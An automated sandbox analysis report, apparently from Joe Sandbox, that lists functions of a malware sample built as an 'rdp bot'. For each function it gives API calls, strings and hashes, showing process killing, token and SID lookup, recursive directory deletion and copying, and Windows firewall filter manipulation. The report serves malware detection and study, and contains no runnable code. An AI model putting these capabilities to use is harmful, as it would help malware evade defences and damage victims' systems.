String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
API String ID: 3255839625-58178811
Opcode ID: 86a0a9880a9f3f17d938d5b1defbe13e2daa6b39b9f30897ca9995e595c12992
Instruction ID: 47503b6020115aba3a166d5cee638dc17d6eedd4cff50c850c1be26380a381bb
Opcode Fuzzy Hash: 86a0a9880a9f3f17d938d5b1defbe13e2daa6b39b9f30897ca9995e595c12992
Instruction Fuzzy Hash: BE518C3660CBC695F7319B29B4413EAB7A5EB95780F844124D6CC4BBA9EB3CC185CB50

Function 00007FF73AFB6FD5 Relevance: 1.5, APIs: 1, Instructions: 25timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF73AFB6FF0

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
Instruction ID: cc0808db1938f5ce2545bc7dac2e19633277cda3b5a460b35ce52d360cc3c8b7
Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
Instruction Fuzzy Hash: ABE022AA72890683FF20D609E0417BBA361C7DC384F904830E85DC3B68EA3CD9428B40

Function 00007FF73AFCB6A0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
Instruction ID: d399a581ac06c2f862f6bf37297078c0c2cba322d44349de225a6c42d416e3c9
Opcode Fuzzy Hash: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
Instruction Fuzzy Hash: F631C68FE8DAE369F65275250C6B1645F91AFB2A217CD44FECE88036C3A80E5C05B321

Function 00007FF73AFC05D9 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
Instruction ID: d81fa87d27dd5db5c251060f14dcdad8173c7c0afadf5e57c3b5136f239ec290
Opcode Fuzzy Hash: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
Instruction Fuzzy Hash: 3EA0021A98DC0AD4F6402F01E802171A52CEB06600FC425B0C0A8520558B2CD000A114

Function 00007FF73AFB212F Relevance: 66.9, APIs: 13, Strings: 25, Instructions: 417processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF73AFB2163
Process32First.KERNEL32 ref: 00007FF73AFB2197
GetLastError.KERNEL32 ref: 00007FF73AFB2227
GetLastError.KERNEL32 ref: 00007FF73AFB22FF
strcmp.MSVCRT ref: 00007FF73AFB24CA
OpenProcess.KERNEL32 ref: 00007FF73AFB24E2
TerminateProcess.KERNEL32 ref: 00007FF73AFB24FC
GetLastError.KERNEL32 ref: 00007FF73AFB250A
CloseHandle.KERNEL32 ref: 00007FF73AFB2895

Strings

|, xrefs: 00007FF73AFB21B6
~, xrefs: 00007FF73AFB260B
[I] (%s) -> Done(name=%s,pid=%lu), xrefs: 00007FF73AFB28B5
NULL, xrefs: 00007FF73AFB2916, 00007FF73AFB2922
, xrefs: 00007FF73AFB2245
(name != NULL) || (pid != 0), xrefs: 00007FF73AFB21C5
[E] (%s) -> Process32First failed(gle=%lu), xrefs: 00007FF73AFB2320
process_kill, xrefs: 00007FF73AFB21CC, 00007FF73AFB21FE, 00007FF73AFB2232, 00007FF73AFB2319, 00007FF73AFB2515, 00007FF73AFB25AE, 00007FF73AFB2719, 00007FF73AFB28AE
[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu), xrefs: 00007FF73AFB2239
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF73AFB21BE
, xrefs: 00007FF73AFB25D5
P, xrefs: 00007FF73AFB2439
P, xrefs: 00007FF73AFB2614
[E] (%s) -> OpenProcess failed(gle=%lu), xrefs: 00007FF73AFB25B5
, xrefs: 00007FF73AFB253C
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF73AFB2720
~, xrefs: 00007FF73AFB238C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB21D3
~, xrefs: 00007FF73AFB22AF
~, xrefs: 00007FF73AFB2430
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF73AFB251C
P, xrefs: 00007FF73AFB22B8
, xrefs: 00007FF73AFB232C
[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x), xrefs: 00007FF73AFB2205
P, xrefs: 00007FF73AFB2395

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
API String ID: 3326156344-4160762685
Opcode ID: 22f98d9e6b6db223fd8ae42b2935bd87373575b709e836097b64c48acc4db2cd
Instruction ID: b97430e8b4c2e2f7ee5dc352537c446c0ff4f2079979864507cf7229d20cba48
Opcode Fuzzy Hash: 22f98d9e6b6db223fd8ae42b2935bd87373575b709e836097b64c48acc4db2cd
Instruction Fuzzy Hash: 3DF16F5CE0C303F2FA7C7655A4C23B8D260AF15745EE004B3CA4E0A6E6DD5DE985B2B2

Function 00007FF73AFB4D81 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF73AFB4DA6
RemoveDirectoryA.KERNEL32 ref: 00007FF73AFB4DBE
GetLastError.KERNEL32 ref: 00007FF73AFB4DC8

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

strcpy.MSVCRT ref: 00007FF73AFB4E92
strlen.MSVCRT ref: 00007FF73AFB4E9A
strlen.MSVCRT ref: 00007FF73AFB4EB6
strlen.MSVCRT ref: 00007FF73AFB4EC7
strcpy.MSVCRT ref: 00007FF73AFB4EE1
strlen.MSVCRT ref: 00007FF73AFB4EE9
strlen.MSVCRT ref: 00007FF73AFB4F0B
strlen.MSVCRT ref: 00007FF73AFB4F1F
strcmp.MSVCRT ref: 00007FF73AFB4F61
strcmp.MSVCRT ref: 00007FF73AFB4F74
RemoveDirectoryA.KERNEL32 ref: 00007FF73AFB501D
GetLastError.KERNEL32 ref: 00007FF73AFB502B

Strings

[D] (%s) -> Delete(path_wc=%s,f_path=%s), xrefs: 00007FF73AFB4F94
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB4DFC
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF73AFB517B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB4E11
fs_dir_delete, xrefs: 00007FF73AFB4DDF, 00007FF73AFB4E0A, 00007FF73AFB4F8D, 00007FF73AFB5042, 00007FF73AFB5111, 00007FF73AFB5174
*, xrefs: 00007FF73AFB4ECC
NULL, xrefs: 00007FF73AFB5165
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF73AFB5118
(path != NULL), xrefs: 00007FF73AFB4E03
[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF73AFB4DE6, 00007FF73AFB5049

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
API String ID: 2460052984-4087913290
Opcode ID: 25b69e423684d8cc3c50e9745d1972c5188a6e48fb09ee3a5ee5cd9d97fc1147
Instruction ID: 33782b5ae88de56168f48f9791853be2fe95a26b0db3d17adeba33ad511c5c9d
Opcode Fuzzy Hash: 25b69e423684d8cc3c50e9745d1972c5188a6e48fb09ee3a5ee5cd9d97fc1147
Instruction Fuzzy Hash: F5A1C62A90CB83B5FA20BB05E5463F9E361AF94386FD404B2D58F47695DF3CE406A721

Function 00007FF73AFB53BF Relevance: 42.3, APIs: 16, Strings: 12, Instructions: 270stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 00007FF73AFB541A
strlen.MSVCRT ref: 00007FF73AFB5422
strlen.MSVCRT ref: 00007FF73AFB5443
strlen.MSVCRT ref: 00007FF73AFB5455
strcmp.MSVCRT ref: 00007FF73AFB54FD
strcmp.MSVCRT ref: 00007FF73AFB5515
strcat.MSVCRT ref: 00007FF73AFB5575
strlen.MSVCRT ref: 00007FF73AFB557D
strcpy.MSVCRT ref: 00007FF73AFB5663
strlen.MSVCRT ref: 00007FF73AFB566B
strlen.MSVCRT ref: 00007FF73AFB568D
strcat.MSVCRT ref: 00007FF73AFB56A6
strcpy.MSVCRT ref: 00007FF73AFB56B9
strlen.MSVCRT ref: 00007FF73AFB56C1
strlen.MSVCRT ref: 00007FF73AFB56E3
strcat.MSVCRT ref: 00007FF73AFB56FF

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB55C6, 00007FF73AFB55F1
(dst != NULL), xrefs: 00007FF73AFB55F8
[E] (%s) -> Failed(src=%s,dst=%s,err=%08x), xrefs: 00007FF73AFB5870
(src != NULL), xrefs: 00007FF73AFB55CD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB55DB, 00007FF73AFB5606
[D] (%s) -> Copy(f_src=%s,f_dst=%s), xrefs: 00007FF73AFB5719
[I] (%s) -> Filtered(f_src=%s,flt=%s), xrefs: 00007FF73AFB55AD
NULL, xrefs: 00007FF73AFB58CD, 00007FF73AFB58D6
|, xrefs: 00007FF73AFB5582
fs_dir_copy, xrefs: 00007FF73AFB55A6, 00007FF73AFB55D4, 00007FF73AFB55FF, 00007FF73AFB5712, 00007FF73AFB5869, 00007FF73AFB58E5
[I] (%s) -> Done(src=%s,dst=%s), xrefs: 00007FF73AFB58EC
*, xrefs: 00007FF73AFB545A

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: strlen$strcatstrcpy$strcmp
String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
API String ID: 2140730755-3699962909
Opcode ID: 495c10b774ece20ef177713593f070f3c0f770e80d0fb8a9a15bc2deafeba13e
Instruction ID: af435a34ff52fd3018d0a9eda157ea64f17c7153e987cd6df5583c277dd83e14
Opcode Fuzzy Hash: 495c10b774ece20ef177713593f070f3c0f770e80d0fb8a9a15bc2deafeba13e
Instruction Fuzzy Hash: 6EC1A66990C783A1FA30BB11A5463FAE371AF84384FD414B2DA8F07685DF6CE506E721

Function 00007FF73AFB1D60 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 207memoryCOMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32 ref: 00007FF73AFB1D8A
GetTokenInformation.ADVAPI32 ref: 00007FF73AFB1DC0
GetLastError.KERNEL32 ref: 00007FF73AFB1DCE
LocalFree.KERNEL32 ref: 00007FF73AFB1E08
CloseHandle.KERNEL32 ref: 00007FF73AFB1E13
GetLastError.KERNEL32 ref: 00007FF73AFB1EB8
LocalAlloc.KERNEL32 ref: 00007FF73AFB1F70
GetTokenInformation.ADVAPI32 ref: 00007FF73AFB1F9E
GetLastError.KERNEL32 ref: 00007FF73AFB1FAC

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

LocalAlloc.KERNEL32 ref: 00007FF73AFB209A
GetLengthSid.ADVAPI32 ref: 00007FF73AFB20AC
memcpy.MSVCRT ref: 00007FF73AFB20BC

Strings

[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu), xrefs: 00007FF73AFB1ECD
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF73AFB1E2B, 00007FF73AFB1E5B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB1E40, 00007FF73AFB1E70
process_get_user_sid, xrefs: 00007FF73AFB1DE3, 00007FF73AFB1E39, 00007FF73AFB1E69, 00007FF73AFB1E9A, 00007FF73AFB1EC6, 00007FF73AFB1FBA
[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu), xrefs: 00007FF73AFB1DEA, 00007FF73AFB1FC1
(sid != NULL), xrefs: 00007FF73AFB1E62
(hnd != NULL), xrefs: 00007FF73AFB1E32
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FF73AFB1EA1

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
API String ID: 3826151639-1775164968
Opcode ID: 8bb0ea1736df8d3edf963a2b7853290c56aa09aa1f6c48da0cf8a94ebb2a490f
Instruction ID: 5bdd55f4d38deb5aa5a5999b3d84e61bd5373aa3bd90ad594edaaf4d75a3eb15
Opcode Fuzzy Hash: 8bb0ea1736df8d3edf963a2b7853290c56aa09aa1f6c48da0cf8a94ebb2a490f
Instruction Fuzzy Hash: 3D91BD2EE0C703A1FA647B05E4563B9D262AF84795FD404B2D94F472A4DE3CF881B365

Function 00007FF73AFB795A Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF73AFB797E
HeapAlloc.KERNEL32 ref: 00007FF73AFB798F
GetProcessHeap.KERNEL32 ref: 00007FF73AFB7C24
HeapFree.KERNEL32 ref: 00007FF73AFB7C35
FwpmFilterAdd0.FWPUCLNT ref: 00007FF73AFB7BEA

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF73AFB7C74
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF73AFB7CAF
FwpmFilterAdd0.FWPUCLNT ref: 00007FF73AFB7D44

Strings

[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF73AFB7C94
mem_alloc, xrefs: 00007FF73AFB7C52
setup_svc_filt, xrefs: 00007FF73AFB7C07, 00007FF73AFB7C8D, 00007FF73AFB7CD2, 00007FF73AFB7D67
TL, xrefs: 00007FF73AFB79C0
[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx), xrefs: 00007FF73AFB7CD9
[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx), xrefs: 00007FF73AFB7C0E
TL, xrefs: 00007FF73AFB7A0C
[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx), xrefs: 00007FF73AFB7D6E
3L, xrefs: 00007FF73AFB7B7F
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF73AFB7C59
;9rJ, xrefs: 00007FF73AFB7CEF

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
API String ID: 3629392964-1470975255
Opcode ID: 40de52bd017b3b5107fba0dfe13c3a76dcdd154043d1e7d6bf5f23c40a91ae53
Instruction ID: a93b2158d916f36942187218d9918166b0dbbd4699f9c14eb1c38a42134a8259
Opcode Fuzzy Hash: 40de52bd017b3b5107fba0dfe13c3a76dcdd154043d1e7d6bf5f23c40a91ae53
Instruction Fuzzy Hash: 03A1E36660D7C295F721EB15B8413AAB7A1FB82784F444178EACD4BB99EF3DC084DB10

Function 00007FF73AFB8153 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AFB8008: GetFileAttributesW.KERNEL32 ref: 00007FF73AFB8019

wcslen.MSVCRT ref: 00007FF73AFB8195
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF73AFB8241
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF73AFB827F
FwpmFilterAdd0.FWPUCLNT ref: 00007FF73AFB8448
GetProcessHeap.KERNEL32 ref: 00007FF73AFB848A
HeapFree.KERNEL32 ref: 00007FF73AFB849B
GetProcessHeap.KERNEL32 ref: 00007FF73AFB84B2
HeapFree.KERNEL32 ref: 00007FF73AFB84C3
FwpmFilterAdd0.FWPUCLNT ref: 00007FF73AFB8523

Strings

[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF73AFB8261
TL, xrefs: 00007FF73AFB8205
3L, xrefs: 00007FF73AFB83DD
[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx), xrefs: 00007FF73AFB82A3
[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx), xrefs: 00007FF73AFB8468
[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx), xrefs: 00007FF73AFB8547
;9rJ, xrefs: 00007FF73AFB84CE
TL, xrefs: 00007FF73AFB81B9
setup_app_filt, xrefs: 00007FF73AFB825A, 00007FF73AFB829C, 00007FF73AFB8461, 00007FF73AFB8540

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
API String ID: 2990311666-1793103013
Opcode ID: fc3b5ae313fded3a9bb40c1c80fe98fb2b1886c9b991d973420dfac19dafbbff
Instruction ID: 4d63357fda5637ee1eac720eae072e7fd0eebddf4e942f5b2b686223d0d69f6c
Opcode Fuzzy Hash: fc3b5ae313fded3a9bb40c1c80fe98fb2b1886c9b991d973420dfac19dafbbff
Instruction Fuzzy Hash: 3291C22660DBC3A5F771EB25A4413AAB7A1EB81780F444134EACC4BB99EF3DC185DB50

Function 00007FF73AFB405E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF73AFB407D
CreateDirectoryA.KERNEL32 ref: 00007FF73AFB409F
GetLastError.KERNEL32 ref: 00007FF73AFB40F0
strcpy.MSVCRT ref: 00007FF73AFB4141
strlen.MSVCRT ref: 00007FF73AFB4149
strlen.MSVCRT ref: 00007FF73AFB4165
strlen.MSVCRT ref: 00007FF73AFB4176
CreateDirectoryA.KERNEL32 ref: 00007FF73AFB41E7
GetLastError.KERNEL32 ref: 00007FF73AFB41F1

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB40C0
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF73AFB432D
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FF73AFB41A0
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB40D5
NULL, xrefs: 00007FF73AFB4317
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF73AFB42C6
(path != NULL), xrefs: 00007FF73AFB40C7
